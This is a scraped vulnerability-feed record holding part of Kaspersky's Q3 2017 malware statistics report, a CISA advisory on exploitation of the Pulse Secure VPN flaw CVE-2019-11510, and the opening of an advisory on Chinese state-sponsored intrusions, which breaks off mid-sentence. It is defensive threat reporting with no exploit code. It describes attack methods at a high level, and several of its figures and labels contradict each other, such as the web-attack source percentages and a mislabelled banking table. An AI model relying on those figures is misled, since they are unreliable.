20.43 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users attacked in each country relative to all users of Kaspersky Lab's mobile security product in the country._\n\nFor the third quarter in a row Iran was the country with the highest percentage of users attacked by mobile malware \u2013 35.12%. Bangladesh came second, with 28.3% of users there encountering a mobile threat at least once during Q3. China (27.38%) followed in third.\n\nRussia (8.68%) came 35th this quarter (vs 26th place in Q2), France (4.9%) was 59th, the US (3.8%) 67th, Italy (5.3%) 56th, Germany (2.9%) 79th, and the UK (3.4%) 72nd.\n\nThe safest countries were Georgia (2.2%), Denmark (1.9%), and Japan (0.8%).\n\n#### Mobile banking Trojans\n\nOver the reporting period we detected 19,748 installation packages for mobile banking Trojans, which is 1.4 times less than in Q2 2017.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-6-en.jpg>)\n\nNumber of installation packages for mobile banking Trojans detected by Kaspersky Lab solutions (Q4 2016 \u2013 Q3 2017)\n\nBanker.AndroidOS.Asacub.ar became the most popular mobile banking Trojan in Q3, replacing the long-term leader Trojan-Banker.AndroidOS.Svpeng.q. These mobile banking Trojans use phishing windows to steal credit card data and logins and passwords for online banking accounts. In addition, they steal money via SMS services, including mobile banking.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-7-en.jpg>)\n\nGeography of mobile banking threats in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Russia | 1.20 \n2 | Uzbekistan | 0.40 \n3 | Kazakhstan | 0.36 \n4 | Tajikistan | 0.35 \n5 | Turkey | 0.34 \n6 | Moldova | 0.31 \n7 | Ukraine | 0.29 \n8 | Kyrgyzstan | 0.27 \n9 | Belarus | 0.26 \n10 | Latvia | 0.23 \n \n_* We eliminated countries from this rating where the number of users of Kaspersky Lab's mobile security product is relatively low (under 10,000). \n** Percentage of unique users in each country attacked by mobile banker Trojans, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nIn Q3 2017, the Top 10 countries attacked by mobile banker Trojans saw little change: Russia (1.2%) topped the ranking again. In second and third places were Uzbekistan (0.4%) and Kazakhstan (0.36%), which came fifth and tenth respectively in the previous quarter. In these countries the Faketoken.z, Tiny.b and Svpeng.y families were the most widespread threats.\n\nOf particular interest is the fact that Australia, a long-term resident at the top end of this rating, didn't make it into our Top 10 this quarter. This was due to a decrease in activity by the [Trojan-Banker.AndroidOS.Acecard](<https://securelist.com/the-evolution-of-acecard/73777/>) and Trojan-Banker.AndroidOS.Marcher mobile banking families.\n\n#### Mobile ransomware\n\nIn Q3 2017, we detected 108,073 mobile Trojan-Ransomware installation packages, which is almost half as much as in the previous quarter.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-8-en.jpg>)\n\nNumber of mobile Trojan-Ransomware installation packages detected by Kaspersky Lab (Q3 2016 \u2013 Q3 2017)\n\nIn our report for Q2, [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that in the first half of 2017, we had discovered more mobile ransomware installation packages than in any other period. The reason was the Trojan-Ransom.AndroidOS.Congur family. However, in the third quarter of this year we observed a decline in this family's activity.\n\nTrojan-Ransom.AndroidOS.Zebt.a became the most popular mobile Trojan-Ransomware in Q3, accounting for more than a third of users attacked by mobile ransomware. Second came Trojan-Ransom.AndroidOS.Svpeng.ab. Meanwhile, [Trojan-Ransom.AndroidOS.Fusob.h](<https://securelist.com/mobile-malware-evolution-2015/73839/>), which topped the rating for several quarters in a row, was only third in Q3 2017.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-9-en.jpg>)\n\nGeography of mobile Trojan-Ransomware in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile Trojan-Ransomware (ranked by percentage of users attacked):**\n\n1 | US | 1.03% \n---|---|--- \n2 | Mexico | 0.91% \n3 | Belgium | 0.85% \n4 | Kazakhstan | 0.79% \n5 | Romania | 0.70% \n6 | Italy | 0.50% \n7 | China | 0.49% \n8 | Poland | 0.49% \n9 | Austria | 0.45% \n10 | Spain | 0.33% \n \n_* We eliminated countries from this ranking where the number of users of Kaspersky Lab's mobile security product is lower than 10,000. \n** Percentage of unique users in each country attacked by mobile Trojan-Ransomware, relative to all users of Kaspersky Lab's mobile security product in the country._\n\nThe US (1.03%) again topped the rating of countries attacked most by mobile Trojan-Ransomware; the most widespread family in the country was Trojan-Ransom.AndroidOS.Svpeng. These Trojans appeared in 2014 as a modification of the Trojan-Banker.AndroidOS.Svpeng mobile banking family. They demand a ransom of about $500 from victims to unblock their devices.\n\nIn Mexico (0.91%), which came second in Q3 2017, most mobile ransomware attacks involved Trojan-Ransom.AndroidOS.Zebt.a. Belgium (0.85%) came third, with Zebt.a the main threat to users there too.\n\n## Vulnerable apps exploited by cybercriminals\n\nQ3 2017 saw continued growth in the number of attacks launched against users involving malicious Microsoft Office documents. We noted the emergence of a large number of combined documents containing an exploit as well as a phishing message \u2013 in case the embedded exploit fails.\n\nAlthough two new Microsoft Office vulnerabilities, CVE-2017-8570 and CVE-2017-8759, have emerged, cybercriminals have continued to exploit CVE-2017-0199, a logical vulnerability in processing HTA objects that was discovered in March 2017. Kaspersky Lab statistics show that attacks against 65% users in Q3 exploited CVE-2017-0199, and less than 1% exploited CVE-2017-8570 or CVE-2017-8759. The overall share of exploits for Microsoft Office was 27.8%.\n\nThere were no large network attacks (such as [WannaCry](<https://securelist.com/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/78351/>) or [ExPetr](<https://securelist.com/from-blackenergy-to-expetr/78937/>)) launched in Q3 using vulnerabilities patched by the MS17-010 update. However, according to KSN data, there was major growth throughout the quarter in the number of attempted exploitations of these vulnerabilities that were blocked by our Intrusion Detection System component. Unsurprisingly, the most popular exploits have been EternalBlue and its modifications, which use an SMB protocol vulnerability; however, KL statistics show that EternalRomance, EternalChampion and an exploit for the CVE-2017-7269 vulnerability in IIS web servers have also been actively used by cybercriminals. EternalBlue, however, accounts for millions of blocked attempted attacks per month, while the numbers for other exploits are much lower.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-10-en.jpg>)\n\nDistribution of exploits used in attacks by type of application attacked, Q3 2017\n\nThe distribution of exploits by the type of attacked application this quarter was practically the same as in Q2. First place is still occupied by exploits targeting browsers and browser components with a share of 35.0% (a decline of 4 p.p. compared to Q2.) The proportion of exploits targeting Android vulnerabilities (22.7%) was almost identical to that in Q2, placing this type of attacked application once again in third behind Office vulnerabilities.\n\n## Online threats (Web-based attacks)\n\n_These statistics are based on detection verdicts returned by the web antivirus module that protects users at the moment when malicious objects are downloaded from a malicious/infected web page. Malicious sites are specifically created by cybercriminals; infected web resources include those whose content is created by users (e.g. forums), as well as legitimate resources._\n\n### Online threats in the banking sector\n\n_These statistics are based on detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. Beginning from the first quarter of 2017 these statistics include malicious programs for ATMs and POS terminals, but do not include mobile threats._\n\nIn Q3 2017, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs capable of stealing money via online banking on 204,388 computers.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-11-en.jpg>)\n\nNumber of users attacked by financial malware, Q3 2017\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM and POS-malware worldwide, we calculate the percentage of Kaspersky Lab product users in the country who encountered this type of threat during the reporting period, relative to all users of our products in that country.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-12-en.jpg>)\n\nGeography of banking malware attacks in Q3 2017 (percentage of all users attacked)\n\n**TOP 10 countries attacked by mobile banker Trojans (ranked by percentage of users attacked)**\n\n| Country* | % of users attacked** \n---|---|--- \n**1** | Togo | 2.30 \n**2** | China | 1.91 \n**3** | Taiwan | 1.65 \n**4** | Indonesia | 1.58 \n**5** | South Korea | 1.56 \n**6** | Germany | 1.53 \n**7** | United Arab Emirates | 1.52 \n**8** | Lebanon | 1.48 \n**9** | Libya | 1.43 \n**10** | Jordan | 1.33 \n \n_These statistics are based on detection verdicts returned by the antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n* We excluded those countries in which the number of Kaspersky Lab product users is relatively small (under 10,000). \n** Unique users whose computers have been targeted by banking Trojan malware attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\n#### TOP 10 banking malware families\n\nThe table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):\n\n| Name* | % of attacked users** \n---|---|--- \n**1** | Trojan-Spy.Win32.Zbot | 27.9 \n**2** | Trojan.Win32.Nymaim | 20.4 \n**3** | Trojan.Win32.Neurevt | 10.0 \n**4** | Trickster | 9.5 \n**5** | SpyEye | 7.5 \n**6** | Caphaw | 6.3 \n**7** | Trojan-Banker.Win32.Gozi | 2.0 \n**8** | Shiz | 1.8 \n**9** | ZAccess | 1.6 \n**10** | NeutrinoPOS | 1.6 \n \n_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._\n\nThe malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%) whose share grew by nearly 4 p.p.\n\n### Cryptoware programs\n\n#### Q3 highlights\n\n##### Crysis rises from the dead\n\nIn our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files. This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.\n\nHowever, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing \u2013 the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a HEX editor to change the key and the contact email.\n\nThe above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer who disclosed all the private keys in May.\n\n##### Surge in Cryrar attacks\n\nThe Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate executable RAR archiver file to place the victim's files in password-encrypted RAR-sfx archives.\n\nIn the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar \u2013 a surge never seen before or since. The malicious actors used the following approach: they crack the password to RDP by brute force, get authentication on the victim's system using the remote access protocol and manually launch the Trojan's installation file. The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.\n\nAccording to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.\n\n##### Master key to original versions of Petya/Mischa/GoldenEye published\n\nIn July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.\n\nThis happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>) which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.\n\nUnfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt MFT.\n\n#### The number of new modifications\n\nIn Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)\n\nNumber of newly created cryptor modifications, Q3 2016 \u2013 Q3 2017\n\nThe number of new cryptor modifications continues to decline compared to previous quarters. This could be a temporary trend, or could indicate that cybercriminals are gradually losing their interest in cryptors as a means of making money, and are switching over to other types of malware.\n\n#### The number of users attacked by ransomware\n\nJuly was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than May and June when two massive epidemics (WannaCry and ExPetr) struck.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)\n\nNumber of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)\n\n#### The geography of attacks\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)\n\n#### Top 10 countries attacked by cryptors\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Myanmar | 0.95% \n2 | Vietnam | 0.92% \n3 | Indonesia | 0.69% \n4 | Germany | 0.62% \n5 | China | 0.58% \n6 | Russia | 0.51% \n7 | Philippines | 0.50% \n8 | Venezuela | 0.50% \n9 | Cambodia | 0.50% \n10 | Austria | 0.49% \n \n_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000) \n** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._\n\nMost of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.\n\nBrazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10. Europe is represented by Germany (0.62%) and Austria (0.49%).\n\nRussia, in tenth the previous quarter, ended Q3 in sixth place.\n\n#### Top 10 most widespread cryptor families\n\n| **Name** | **Verdict*** | **% of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% | \n2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% | \n3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% | \n4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% | \n5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% | \n6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% | \n7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% | \n8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% | \n9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% | \n10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% | \n \n_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data. \n** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._\n\nWannacry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that Wannacry exploits.\n\nCrypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.\n\nThe cryptor Purgen (6.90%) rounds off the top three after rising from ninth. The rest of the rating is populated by 'old timers' \u2013 the Trojans Locky, Cerber, Cryrar, Shade, and Spora.\n\nThe Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.\n\n### Top 10 countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)\n\nDistribution of web attack sources by country, Q3 2017\n\nIn Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).\n\n**Countries where users faced the greatest risk of online infection**\n\nIn order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.\n\nThis rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Belarus | 27.35 \n2 | Algeria | 24.23 \n3 | Russia | 23.91 \n4 | Armenia | 23.74 \n5 | Moldova | 23.61 \n6 | Greece | 21.48 \n7 | Azerbaijan | 21.14 \n8 | Kyrgyzstan | 20.83 \n9 | Uzbekistan | 20.24 \n10 | Albania | 20.10 \n11 | Ukraine | 19.82 \n12 | Kazakhstan | 19.55 \n13 | France | 18.94 \n14 | Venezuela | 18.68 \n15 | Brazil | 18.01 \n16 | Portugal | 17.93 \n17 | Vietnam | 17.81 \n18 | Tajikistan | 17.63 \n19 | Georgia | 17.50 \n20 | India | 17.43 \n \n_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._ \n_* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)\n\nGeography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)\n\nThe countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).\n\n## Local threats\n\n_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._\n\nIn Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.\n\n**Countries where users faced the highest risk of local infection**\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating of malicious programs only includes **Malware-class** attacks. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| **Country*** | **% of users attacked**** \n---|---|--- \n1 | Yemen | 56.89 \n2 | Vietnam | 54.32 \n3 | Afghanistan | 53.25 \n4 | Uzbekistan | 53.02 \n5 | Laos | 52.72 \n6 | Tajikistan | 49.72 \n7 | Ethiopia | 48.90 \n8 | Syria | 47.71 \n9 | Myanmar | 46.82 \n10 | Cambodia | 46.69 \n11 | Iraq | 45.79 \n12 | Turkmenistan | 45.47 \n13 | Libya | 45.00 \n14 | Bangladesh | 44.54 \n15 | China | 44.40 \n16 | Sudan | 44.27 \n17 | Mongolia | 44.18 \n18 | Mozambique | 43.84 \n19 | Rwanda | 43.22 \n20 | Belarus | 42.53 \n \n_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._ \n_* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users). \n** The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._\n\nThis Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance. The proportion of users attacked in Russia amounted to 29.09%.\n\nOn average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)\n\nGeography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)\n\n**The safest countries in terms of local infection risks **included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).\n\n_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._", "cvss3": {}, "published": "2017-11-10T10:45:04", "type": "securelist", "title": "IT threat evolution Q3 2017. Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-7269", "CVE-2017-8570", "CVE-2017-8759"], "modified": "2017-11-10T10:45:04", "href": "https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/", "id": "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ics": [{"lastseen": "2023-09-23T07:50:23", "description": "### Summary\n\nUnpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix an arbitrary file reading vulnerability, known as CVE-2019-11510, can become compromised in an attack. [[1]](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\nAlthough Pulse Secure [[2]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>) disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [[3]](<https://www.kb.cert.org/vuls/id/927237/ >) [[4]](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications >) [[5]](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\nCISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. [[6]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n## Timelines of Specific Events\n\n * April 24, 2019 \u2013 Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.\n * May 28, 2019 \u2013 Large commercial vendors get reports of vulnerable VPN through HackerOne.\n * July 31, 2019 \u2013 Full use of exploit demonstrated using the admin session hash to get complete shell.\n * August 8, 2019 \u2013 Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.\n * August 24, 2019 \u2013 Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.\n * October 7, 2019 \u2013 The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.\n * October 16, 2019 \u2013 The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.\n * January 2020 \u2013 Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware. \n\n### Technical Details\n\n## Impact\n\nA remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.\n\nAffected versions:\n\n * Pulse Connect Secure 9.0R1 - 9.0R3.3\n * Pulse Connect Secure 8.3R1 - 8.3R7\n * Pulse Connect Secure 8.2R1 - 8.2R12\n * Pulse Connect Secure 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1\n * Pulse Policy Secure 5.4R1 - 5.4R7\n * Pulse Policy Secure 5.3R1 - 5.3R12\n * Pulse Policy Secure 5.2R1 - 5.2R12\n * Pulse Policy Secure 5.1R1 - 5.1R15\n\n### Mitigations\n\nThis vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.\n\nCISA strongly urges users and administrators to upgrade to the corresponding fixes. [[7]](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### References\n\n[[1] NIST NVD CVE-2019-11510 ](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n\n[[2] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[3] CERT/CC Vulnerability Note VU#927237](<https://www.kb.cert.org/vuls/id/927237/>)\n\n[[4] CISA Current Activity Vulnerabilities in Multiple VPN Applications ](<https://www.us-cert.gov/ncas/current-activity/2019/07/26/vulnerabilities-multiple-vpn-applications>)\n\n[[5] CISA Current Activity Multiple Vulnerabilities in Pulse Secure VPN](<https://www.us-cert.gov/ncas/current-activity/2019/10/16/multiple-vulnerabilities-pulse-secure-vpn>)\n\n[[6] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n[[7] Pulse Secure Advisory SA44101](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n\n### Revisions\n\nJanuary 10, 2020: Initial Version|April 15, 2020: Revised to correct type of vulnerability\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-04-15T12:00:00", "type": "ics", "title": "Continued Exploitation of Pulse Secure VPN Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2022-42475", "CVE-2022-47966"], "modified": "2020-04-15T12:00:00", "id": "AA20-010A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-010a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-23T07:08:20", "description": "### Summary\n\n_This advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework, Version 9, and MITRE D3FEND\u2122 framework, version 0.9.2-BETA-3. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v8/techniques/enterprise/>) for all referenced threat actor tactics and techniques and the [D3FEND framework](<https://d3fend.mitre.org/>) for referenced defensive tactics and techniques._\n\nThe National Security Agency, Cybersecurity and Infrastructure Security Agency (CISA), and Federal Bureau of Investigation (FBI) assess that People\u2019s Republic of China state-sponsored malicious cyber activity is a major threat to U.S. and Allied cyberspace assets. Chinese state-sponsored cyber actors aggressively target U.S. and allied political, economic, military, educational, and critical infrastructure (CI) personnel and organizations to steal sensitive data, critical and emerging key technologies, intellectual property, and personally identifiable information (PII). Some target sectors include managed service providers, semiconductor companies, the Defense Industrial Base (DIB), universities, and medical institutions. These cyber operations support China\u2019s long-term economic and military development objectives.\n\nThis Joint Cybersecurity Advisory (CSA) provides information on tactics, techniques, and procedures (TTPs) used by Chinese state-sponsored cyber actors. This advisory builds on previous NSA, CISA, and FBI reporting to inform federal, state, local, tribal, and territorial (SLTT) government, CI, DIB, and private industry organizations about notable trends and persistent TTPs through collaborative, proactive, and retrospective analysis.\n\nTo increase the defensive posture of their critical networks and reduce the risk of Chinese malicious cyber activity, NSA, CISA, and FBI urge government, CI, DIB, and private industry organizations to apply the recommendations listed in the Mitigations section of this advisory and in Appendix A: Chinese State-sponsored Cyber Actors' Observed Procedures. **Note:** NSA, CISA, and FBI encourage organization leaders to review [CISA Joint Insights: Chinese Malicious Cyber Activity: Threat Overview for 